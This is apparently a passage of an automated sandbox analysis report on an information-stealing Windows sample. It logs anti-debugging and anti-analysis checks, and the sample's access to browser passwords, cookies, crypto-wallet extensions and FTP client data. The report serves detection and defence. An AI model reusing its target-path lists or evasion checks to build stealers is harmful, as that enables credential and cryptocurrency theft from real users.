            Source: file.exe, 00000000.00000003.1368377137.0000000005CFF000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: outlook.office365.comVMware20,11696492231t
            Source: file.exe, 00000000.00000003.1368377137.0000000005D04000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: - GDCDYNVMware20,11696492231p
            Source: file.exe, 00000000.00000003.1368377137.0000000005CFF000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: Interactive Brokers - NDCDYNVMware20,11696492231z
            Source: file.exe, 00000000.00000003.1368377137.0000000005CFF000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: discord.comVMware20,11696492231f
            Source: file.exe, 00000000.00000003.1368377137.0000000005CFF000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: global block list test formVMware20,11696492231
            Source: file.exe, 00000000.00000003.1368377137.0000000005CFF000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: dev.azure.comVMware20,11696492231j
            Source: file.exe, 00000000.00000003.1368377137.0000000005CFF000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: www.interactivebrokers.comVMware20,11696492231}
            Source: file.exe, 00000000.00000003.1368377137.0000000005CFF000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: www.interactivebrokers.co.inVMware20,11696492231~
            Source: file.exe, 00000000.00000003.1368377137.0000000005CFF000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: bankofamerica.comVMware20,11696492231x
            Source: file.exe, 00000000.00000003.1368377137.0000000005CFF000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: trackpan.utiitsl.comVMware20,11696492231h
            Source: file.exe, 00000000.00000002.1498844199.00000000014C9000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: Hyper-V RAWP
            Source: file.exe, 00000000.00000003.1368377137.0000000005CFF000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: tasks.office.comVMware20,11696492231o
            Source: file.exe, 00000000.00000003.1368377137.0000000005CFF000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: account.microsoft.com/profileVMware20,11696492231u
            Source: file.exe, 00000000.00000003.1368377137.0000000005CFF000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: Canara Change Transaction PasswordVMware20,11696492231
            Source: file.exe, 00000000.00000003.1368377137.0000000005CFF000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: Interactive Brokers - EU East & CentralVMware20,11696492231
            Source: file.exe, 00000000.00000003.1368377137.0000000005CFF000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: ms.portal.azure.comVMware20,11696492231
            Source: file.exe, 00000000.00000002.1498124678.0000000000D9C000.00000040.00000001.01000000.00000003.sdmp | Binary or memory string: Restart now?\\.\Oreans.vxd%s\Oreans.vxdXprotEventHARDWARE\ACPI\DSDT\VBOX__SeShutdownPrivilegeSoftware\WinLicenseCreateEvent API Error while extraction the driverGetEnvironmentVariable API Error while extraction the driverOpenSCManager API Error while extraction the driverCreateService API Error while extraction the driverCloseServiceHandle API Error while extraction the driverOpenService API Error while extraction the driverStartService API Error while extraction the driverAPIC error: Cannot find Processors Control Blocks. Please,
            Source: file.exe, 00000000.00000003.1368377137.0000000005CFF000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: turbotax.intuit.comVMware20,11696492231t
            Source: file.exe, 00000000.00000003.1368377137.0000000005CFF000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: secure.bankofamerica.comVMware20,11696492231|UE
            Source: file.exe, 00000000.00000003.1368377137.0000000005CFF000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: Canara Transaction PasswordVMware20,11696492231x
            Source: file.exe, 00000000.00000003.1368377137.0000000005CFF000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: Interactive Brokers - HKVMware20,11696492231]
            Source: C:\Users\user\Desktop\file.exe | System information queried: ModuleInformation
            Source: C:\Users\user\Desktop\file.exe | Process information queried: ProcessInformation

            Anti Debugging

            Source: C:\Users\user\Desktop\file.exe | Thread information set: HideFromDebugger
            Source: C:\Users\user\Desktop\file.exe | Open window title or class name: regmonclass
            Source: C:\Users\user\Desktop\file.exe | Open window title or class name: gbdyllo
            Source: C:\Users\user\Desktop\file.exe | Open window title or class name: process monitor - sysinternals: www.sysinternals.com
            Source: C:\Users\user\Desktop\file.exe | Open window title or class name: procmon_window_class
            Source: C:\Users\user\Desktop\file.exe | Open window title or class name: registry monitor - sysinternals: www.sysinternals.com
            Source: C:\Users\user\Desktop\file.exe | Open window title or class name: ollydbg
            Source: C:\Users\user\Desktop\file.exe | Open window title or class name: filemonclass
            Source: C:\Users\user\Desktop\file.exe | Open window title or class name: file monitor - sysinternals: www.sysinternals.com
            Source: C:\Users\user\Desktop\file.exe | File opened: NTICE
            Source: C:\Users\user\Desktop\file.exe | File opened: SICE
            Source: C:\Users\user\Desktop\file.exe | File opened: SIWVID
            Source: C:\Users\user\Desktop\file.exe | Process queried: DebugPort
            Source: C:\Users\user\Desktop\file.exe | Process queried: DebugPort
            Source: C:\Users\user\Desktop\file.exe | Process queried: DebugPort
            Source: file.exe, file.exe, 00000000.00000002.1498124678.0000000000D9C000.00000040.00000001.01000000.00000003.sdmp | Binary or memory string: Program Manager
            Source: C:\Users\user\Desktop\file.exe | Queries volume information: C:\ VolumeInformation
            Source: C:\Users\user\Desktop\file.exe | Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid
            Source: file.exe, file.exe, 00000000.00000002.1498844199.00000000014F9000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1441241710.0000000001573000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.1499094285.0000000001553000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1497593408.000000000154D000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: %ProgramFiles%\Windows Defender\MsMpeng.exe
            Source: C:\Users\user\Desktop\file.exe | WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT * FROM AntiVirusProduct

            Stealing of Sensitive Information

            Source: Yara match | File source: Process Memory Space: file.exe PID: 7472, type: MEMORYSTR
            Source: Yara match | File source: sslproxydump.pcap, type: PCAP
            Source: file.exe, 00000000.00000002.1498844199.00000000014F9000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: Wallets/Electrum
            Source: file.exe, 00000000.00000002.1498844199.00000000014F9000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: Wallets/ElectronCash
            Source: file.exe | String found in binary or memory: Jaxx Liberty
            Source: file.exe, 00000000.00000002.1498844199.00000000014F9000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: window-state.json
            Source: file.exe | String found in binary or memory: ExodusWeb3
            Source: file.exe, 00000000.00000002.1498844199.00000000014F9000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: Wallets/Ethereum
            Source: file.exe | String found in binary or memory: %localappdata%\Coinomi\Coinomi\wallets
            Source: file.exe | String found in binary or memory: keystore
            Source: C:\Users\user\Desktop\file.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hpglfhgfnhbgpjdenjgmdgoeiappafln
            Source: C:\Users\user\Desktop\file.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aeachknmefphepccionboohckonoeemg
            Source: C:\Users\user\Desktop\file.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dngmlblcodfobpdpecaadgfbcggfjfnm
            Source: C:\Users\user\Desktop\file.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lgmpcpglpngdoalbgeoldeajfclnhafa
            Source: C:\Users\user\Desktop\file.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\flpiciilemghbmfalicajoolhkkenfe
            Source: C:\Users\user\Desktop\file.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nlbmnnijcnlegkjjpcfjclmcfggfefdm
            Source: C:\Users\user\Desktop\file.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ejjladinnckdgjemekebdpeokbikhfci
            Source: C:\Users\user\Desktop\file.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ffnbelfdoeiohenkjibnmadjiehjhajb
            Source: C:\Users\user\Desktop\file.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fijngjgcjhjmmpcmkeiomlglpeiijkld
            Source: C:\Users\user\Desktop\file.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lkcjlnjfpbikmcmbachjpdbijejflpcm
            Source: C:\Users\user\Desktop\file.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\oeljdldpnmdbchonielidgobddffflа
            Source: C:\Users\user\Desktop\file.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nhnkbkgjikgcigadomkphalanndcapjk
            Source: C:\Users\user\Desktop\file.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ilgcnhelpchnceeipipijaljkblbcob
            Source: C:\Users\user\Desktop\file.exe | File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data For Account
            Source: C:\Users\user\Desktop\file.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fnjhmkhhmkbjkkabndcnnogagogbneec
            Source: C:\Users\user\Desktop\file.exe | File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fu7wner3.default-release\formhistory.sqlite
            Source: C:\Users\user\Desktop\file.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ijmpgkjfkbfhoebgogflfebnmejmfbm
            Source: C:\Users\user\Desktop\file.exe | File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fu7wner3.default-release\prefs.js
            Source: C:\Users\user\Desktop\file.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cnmamaachppnkjgnildpdmkaakejnhae
            Source: C:\Users\user\Desktop\file.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fhmfendgdocmcbmfikdcogofphimnkno
            Source: C:\Users\user\Desktop\file.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\egjidjbpglichdcondbcbdnbeeppgdph
            Source: C:\Users\user\Desktop\file.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\anokgmphncpekkhclmingpimjmcooifb
            Source: C:\Users\user\Desktop\file.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\efbglgofoippbgcjepnhiblaibcnclgk
            Source: C:\Users\user\Desktop\file.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data For Account
            Source: C:\Users\user\Desktop\file.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bhghoamapcdpbohphigoooaddinpkbai
            Source: C:\Users\user\Desktop\file.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ejbalbakoplchlghecdalmeeeajnimhm
            Source: C:\Users\user\Desktop\file.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cpojfbodiccabbabgimdeohkkpjfpbnf
            Source: C:\Users\user\Desktop\file.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kjmoohlgokccodicjjfebfomlbljgfhk
            Source: C:\Users\user\Desktop\file.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\History
            Source: C:\Users\user\Desktop\file.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hdokiejnpimakedhajhdlcegeplioahd
            Source: C:\Users\user\Desktop\file.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\acmacodkjbdgmoleebolmdjonilkdbch
            Source: C:\Users\user\Desktop\file.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mmmjbcfofconkannjonfmjjajpllddbg
            Source: C:\Users\user\Desktop\file.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aiifbnbfobpmeekipheeijimdpnlpgpp
            Source: C:\Users\user\Desktop\file.exe | File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\Cookies
            Source: C:\Users\user\Desktop\file.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aholpfdialjgjfhomihkjbmgjidlcdno
            Source: C:\Users\user\Desktop\file.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kncchdigobghenbbaddojjnnaogfppfj
            Source: C:\Users\user\Desktop\file.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\klnaejjgbibmhlephnhpmaofohgkpgkd
            Source: C:\Users\user\Desktop\file.exe | File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles
            Source: C:\Users\user\Desktop\file.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cihmoadaighcejopammfbmddcmdekcje
            Source: C:\Users\user\Desktop\file.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mopnmbcafieddcagagdcbnhejhlodfdd
            Source: C:\Users\user\Desktop\file.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jojhfeoedkpkglbfimdfabpdfjaoolaf
            Source: C:\Users\user\Desktop\file.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aeblfdkhhhdcdjpifhhbdiojplfjncoa
            Source: C:\Users\user\Desktop\file.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bhhhlbepdkbapadjdnnojkbgioiodbic
            Source: C:\Users\user\Desktop\file.exe | File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\History
            Source: C:\Users\user\Desktop\file.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cphhlgmgameodnhkjdmkpanlelnlohao
            Source: C:\Users\user\Desktop\file.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dmkamcknogkgcdfhhbddcghachkejeap
            Source: C:\Users\user\Desktop\file.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dlcobpjiigpikoobohmabehhmhfoodbb
            Source: C:\Users\user\Desktop\file.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\infeboajgfhgbjpjbeppbkgnabfdkdaf
            Source: C:\Users\user\Desktop\file.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dkdedlpgdmmkkfjabffeganieamfklkm
            Source: C:\Users\user\Desktop\file.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ookjlbkiijinhpmnjffcofjonbfbgaoc
            Source: C:\Users\user\Desktop\file.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nngceckbapebfimnlniiiahkandclblb
            Source: C:\Users\user\Desktop\file.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\pioclpoplcdbaefihamjohnefbikjilc
            Source: C:\Users\user\Desktop\file.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kkpllkodjeloidieedojogacfhpaihoh
            Source: C:\Users\user\Desktop\file.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ibnejdfjmmkpcnlpebklmnkoeoihofec
            Source: C:\Users\user\Desktop\file.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ppbibelpcjmhbdihakflkdcoccbgbkpo
            Source: C:\Users\user\Desktop\file.exe | File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data
            Source: C:\Users\user\Desktop\file.exe | File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fu7wner3.default-release\cert9.db
            Source: C:\Users\user\Desktop\file.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ojggmchlghnjlapmfbnjholfjkiidbch
            Source: C:\Users\user\Desktop\file.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kppfdiipphfccemcignhifpjkapfbihd
            Source: C:\Users\user\Desktop\file.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jiidiaalihmmhddjgbnbgdfflelocpak
            Source: C:\Users\user\Desktop\file.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data
            Source: C:\Users\user\Desktop\file.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hcflpincpppdclinealmandijcmnkbgn
            Source: C:\Users\user\Desktop\file.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fhbohimaelbohpjbbldcngcnapndodjp
            Source: C:\Users\user\Desktop\file.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nkbihfbeogaeaoehlefnkodbefgpgknn
            Source: C:\Users\user\Desktop\file.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kpfopkelmapcoipemfendmdcghnegimn
            Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fu7wner3.default-release\cookies.sqliteJump to behavior
            Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hnfanknocfeofbddgcijnmhnfnkdnaadJump to behavior
            Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bfnaelmomeimhlpmgjnjophhpkkoljpaJump to behavior
            Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\blnieiiffboillknjnepogjhkgnoapacJump to behavior
            Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ocjdpmoallmgmjbbogfiiaofphbjgchhJump to behavior
            Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mkpegjkblkkefacfnmkajcjmabijhclgJump to behavior
            Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fihkakfobkmkjojpchpfgcmhfjnmnfpiJump to behavior
            Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\onofpnbbkehpmmoabgpcpmigafmmnjhJump to behavior
            Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nlgbhdfgdhgbiamfdfmbikcdghidoaddJump to behavior
            Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\afbcbjpbpfadlkmhmclhkeeodmamcflcJump to behavior
            Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cjelfplplebdjjenllpjcblmjkfcffneJump to behavior
            Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fu7wner3.default-release\logins.jsonJump to behavior
            Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nknhiehlklippafakaeklbeglecifhadJump to behavior
            Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fu7wner3.default-release\places.sqliteJump to behavior
            Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\ilgcnhelpchnceeipipijaljkblbcobJump to behavior
            Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\opcgpfmipidbgpenhmajoajpbobppdilJump to behavior
            Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nanjmdknhkinifnkgdcggcfnhdaammmjJump to behavior
            Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\amkmjjmmflddogmhpjloimipbofnfjihJump to behavior
            Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mcohilncbfahbmgdjkbpemcciiolgcgeJump to behavior
            Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jgaaimajipbpdogpdglhaphldakikgefJump to behavior
            Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jnlgamecbpmbajjfhmmmlhejkemejdmaJump to behavior
            Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\CookiesJump to behavior
            Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\oeljdldpnmdbchonielidgobddffflaJump to behavior
            Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\imloifkgjagghnncjkhggdhalmcnfklkJump to behavior
            Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\phkbamefinggmakgklpkljjmgibohnbaJump to behavior
            Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fu7wner3.default-release\key4.dbJump to behavior
            Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bcopgchhojmggmffilplmbdicgaihlkpJump to behavior
            Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hifafgmccdpekplomjjkcfgodnhcelljJump to behavior
            Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\gaedmjdfmmahhbjefcbgaolhhanlaolbJump to behavior
            Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nkddgncdjgjfcddamfgcmfnlhccnimigJump to behavior
            Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login DataJump to behavior
            Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cnncmdhjacpkmjmkcafchppbnpnhdmonJump to behavior
            Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jbdaocneiiinmjbjlgalhcelgbejmnidJump to behavior
            Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lpfcbjknijpeeillifnkikgncikgfhdoJump to behavior
            Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aflkmfhebedbjioipglgcbcmnbpgliofJump to behavior
            Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lodccjjbdhfakaekdiahmedfbieldgikJump to behavior
            Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\heefohaffomkkkphnlpohglngmbcclhiJump to behavior
            Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\bhghoamapcdpbohphigoooaddinpkbaiJump to behavior
            Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mnfifefkajgofkcjkemidiaecocnkjehJump to behavior
            Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fcfcfllfndlomdhbehjjcoimbgofdncgJump to behavior
            Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\onhogfjeacnfoofkfgppdlbmlmnplgbnJump to behavior
            Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\loinekcabhlmhjjbocijdoimmejangoaJump to behavior
            Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\idnnbdplmphpflfnlkomgpfbpcgelopgJump to behavior
            Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Roaming\FTPboxJump to behavior
            Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Roaming\SmartFTP\Client 2.0\FavoritesJump to behavior
            Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Roaming\FTPRushJump to behavior
            Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Roaming\Conceptworld\NotezillaJump to behavior
            Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Roaming\FTPGetterJump to behavior
            Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Roaming\FTPInfoJump to behavior
            Source: C:\Users\user\Desktop\file.exeFile opened: C:\ProgramData\SiteDesigner\3D-FTPJump to behavior
            Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Roaming\Exodus\exodus.walletJump to behavior
            Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Roaming\Exodus\exodus.walletJump to behavior
            Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Roaming\Ledger LiveJump to behavior
            Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Roaming\atomic\Local Storage\leveldbJump to behavior
            Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\walletsJump to behavior
            Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\walletsJump to behavior
            Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Roaming\Bitcoin\walletsJump to behavior
            Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Roaming\BinanceJump to behavior
            Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Roaming\com.liberty.jaxx\IndexedDBJump to behavior
            Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Roaming\Electrum\walletsJump to behavior
            Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Roaming\Electrum-LTC\walletsJump to behavior
            Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Roaming\Guarda\IndexedDBJump to behavior
            Source: C:\Users\user\Desktop\file.exeDirectory queried: C:\Users\user\Documents\IZMFBFKMEBJump to behavior
            Source: C:\Users\user\Desktop\file.exeDirectory queried: C:\Users\user\Documents\IZMFBFKMEBJump to behavior
            Source: C:\Users\user\Desktop\file.exeDirectory queried: C:\Users\user\Documents\LIJDSFKJZGJump to behavior
            Source: C:\Users\user\Desktop\file.exeDirectory queried: C:\Users\user\Documents\LIJDSFKJZGJump to behavior
            Source: C:\Users\user\Desktop\file.exeDirectory queried: C:\Users\user\Documents\LIJDSFKJZGJump to behavior
            Source: C:\Users\user\Desktop\file.exeDirectory queried: C:\Users\user\Documents\LIJDSFKJZGJump to behavior
            Source: C:\Users\user\Desktop\file.exeDirectory queried: C:\Users\user\Documents\PWZOQIFCANJump to behavior
            Source: C:\Users\user\Desktop\file.exeDirectory queried: C:\Users\user\Documents\PWZOQIFCANJump to behavior
            Source: C:\Users\user\Desktop\file.exeDirectory queried: C:\Users\user\Documents\SNIPGPPREPJump to behavior
            Source: C:\Users\user\Desktop\file.exeDirectory queried: C:\Users\user\Documents\SNIPGPPREPJump to behavior
            Source: Yara matchFile source: 00000000.00000003.1420219520.000000000155F000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: Process Memory Space: file.exe PID: 7472, type: MEMORYSTR
